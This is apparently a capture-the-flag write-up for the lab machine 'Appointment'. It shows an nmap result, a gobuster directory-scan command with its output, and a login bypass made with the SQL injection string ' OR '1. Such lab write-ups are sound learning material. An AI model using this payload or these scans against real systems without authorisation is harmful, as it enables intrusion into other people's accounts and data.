Appointment
Resolution summary
- Initial scan showed port 80 open
- Web page shows a login, ran a gobuster scan to see if there are any other open pages
- While that was running, ran some common sql injection
- Simple injection worked and we got the flag
Improved skills
- SQL Injection
Used tools
- nmap
- gobuster
Information Gathering
Nmap
### 10.129.25.237
| Port | State | Service | Version |
|------|-------|---------|---------|
| 80/tcp | open | http | Apache httpd 2.4.38 |
Enumeration
Port 80 - HTTP (Apache)
This is a web application, so lets start using gobuster to get a quick scan and see if we're missing anything.
Gobuster returned nothing but:
└─$ gobuster dir -u 10.129.25.237 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.25.237
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/03/13 20:25:48 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://10.129.25.237/images/]
/css (Status: 301) [Size: 312] [--> http://10.129.25.237/css/]
/js (Status: 301) [Size: 311] [--> http://10.129.25.237/js/]
/vendor (Status: 301) [Size: 315] [--> http://10.129.25.237/vendor/]
/fonts (Status: 301) [Size: 314] [--> http://10.129.25.237/fonts/]
Progress: 87629 / 87665 (99.96%)
===============================================================
2023/03/13 20:34:06 Finished
===============================================================
Exploitation
SQL Injection
Ran simple sql injection of ' OR '1 into the admin field, password can be anything
Trophy & Loot
flag
Your flag is: e3d07****************6f42e9672